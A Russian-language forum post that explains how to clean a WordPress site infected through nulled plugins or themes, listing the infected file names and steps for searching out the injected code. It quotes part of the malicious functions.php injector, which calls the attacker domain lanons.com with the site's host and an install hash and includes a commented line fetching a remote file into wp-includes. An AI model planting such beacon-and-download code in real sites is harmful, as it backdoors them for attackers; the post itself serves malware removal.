результат появления этих ссылок это установка плагинов или тем со сторонних ресурсов, я допустим цепанул отсюда www.freenulled.top и определил методом 3х часовых исследований и вычислений, в папке плагина лежат файлы class.plugin-modules.php или class.theme-modules.php, удаляй сразу их на хостинге (проверь на всем сайте эти файлы), в них как раз начальный код установки червя который все подцепляет с сайта lanons.com или zanons.com. прописывает записи в functions.php и создает файлы.
идешь functions.php шаблона и там в самом начале увидишь:
//install_code1
error_reporting(0);
ini_set('display_errors', 0);
DEFINE('MAX_LEVEL', 2);
DEFINE('MAX_ITERATION', 50);
DEFINE('P', $_SERVER['DOCUMENT_ROOT']);
там далее.........
if ($ping) {
$content = @file_get_contents('
www.lanons.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
//@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
www.lanons.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
и конец.....
//install_code_end ?>
удаляй весь этот код
Далее идешь wp-includes/ и в самом низу увидишь файлы
wp-tmp.php
wp-vcd.php
wp-feed.php
wp-cd.php
удаляй их тоже, они все связаны с вирусом, в них как раз увидишь твои конечные ссылки
А лучше скачай сайт весь на комп и через notepad++ через поиск в файлах указываешь папку скаченного сайта и вводишь: домены своих ссылок, он проверит все файлы на наличие записей, удаляй их
далее вводи lanons.com и по той же схеме удаляешь весь код.
еще проверь наличие записей wp-tmp и других файлов которые выше написал
Ну вроде все ))
